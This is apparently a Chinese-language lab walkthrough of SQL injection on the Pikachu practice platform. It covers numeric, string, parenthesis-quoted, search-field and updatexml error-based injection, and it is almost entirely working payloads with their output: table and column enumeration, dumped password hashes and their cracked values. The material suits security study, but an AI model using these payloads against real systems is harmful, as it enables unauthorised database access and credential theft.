id=1 order by 2#&submit=%E6%9F%A5%E8%AF%A2
發現order by 3 報錯,order by2 正常,字段數就是2
正常走流程爆庫
id=1 union select 1,database()#
pikachu
爆表
id=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
httpinfo,member,message,users,xssblind
爆字段
id=1 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database()#
id,userid,ipaddress,useragent,httpaccept,remoteport,id,username,pw,sex,phonenum,address,email,id,content,time,id,username,password,level,id,time,content,name
下面就是字段里的數據了
1 union select username,password from users#
e10adc3949ba59abbe56e057f20f883e
670b14728ad9902aecba32e22fa4f6bd
e99a18c428cb38d5f260853678922e03
像是md5解碼,md5在線解密下
123456
000000
abc123
字符型注入
看一下源碼,需要考慮閉合是單引號
輸入萬能注入,有變化證明語句正確
1' or 1=1#
判斷字段數,道理同數字型注入
1' order by 2#
爆庫
1' union select 1,database()#
pikachu
爆表
1' union select group_concat(table_name),2 from information_schema.tables where table_schema=database()#
httpinfo,member,message,users,xssblind
爆字段
1' union select group_concat(column_name),2 from information_schema.columns where table_name='users'#
user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password,level,id,username,password
爆值
1' union select username,password from users#
your uid:admin
your email is: e10adc3949ba59abbe56e057f20f883e
your uid:pikachu
your email is: 670b14728ad9902aecba32e22fa4f6bd
your uid:test
your email is: e99a18c428cb38d5f260853678922e03
同理用md5解密
XX型注入
查看源碼,單引號和括號
嘗試一下
1') or 1=1#
成功了,按照流程繼續
爆庫
1') union select 1,database()#
pikachu
爆表
1') union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
httpinfo,member,message,users,xssblind
爆字段
1') union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#
user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password,level,id,username,password
爆值
1') union select username,password from users#
your uid:admin
your email is: e10adc3949ba59abbe56e057f20f883e
your uid:pikachu
your email is: 670b14728ad9902aecba32e22fa4f6bd
your uid:test
your email is: e99a18c428cb38d5f260853678922e03
搜索型注入
查看源碼,單引號和百分號
1%' or 1=1#
成功了,那還是老流程
判斷字段數,這個是到4才顯示錯誤
1%' order by 4#
字段數就是3了
爆庫
1%' union select 1,2,database()#
pikachu
爆表
1%' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#
httpinfo,member,message,users,xssblind
爆字段
1%' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'#
user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password,level,id,username,password
爆值
1%' union select username,password,3 from users#
username:admin
uid:e10adc3949ba59abbe56e057f20f883e
email is: 3
username:pikachu
uid:670b14728ad9902aecba32e22fa4f6bd
email is: 3
username:test
uid:e99a18c428cb38d5f260853678922e03
email is: 3
"insert/update"注入
查看源碼,會對字符進行轉義,聯合注入就不能用了,進行報錯注入
bp在注冊界面抓包,爆庫
1' or updatexml(1,concat(0x7e,database()),1) or'
爆表
1' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1) or'
爆字段
1' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')),1) or'
爆值
1' or updatexml(1,concat(0x7e,(select group_concat(username,'@',password)from pikachu.users)),1) or'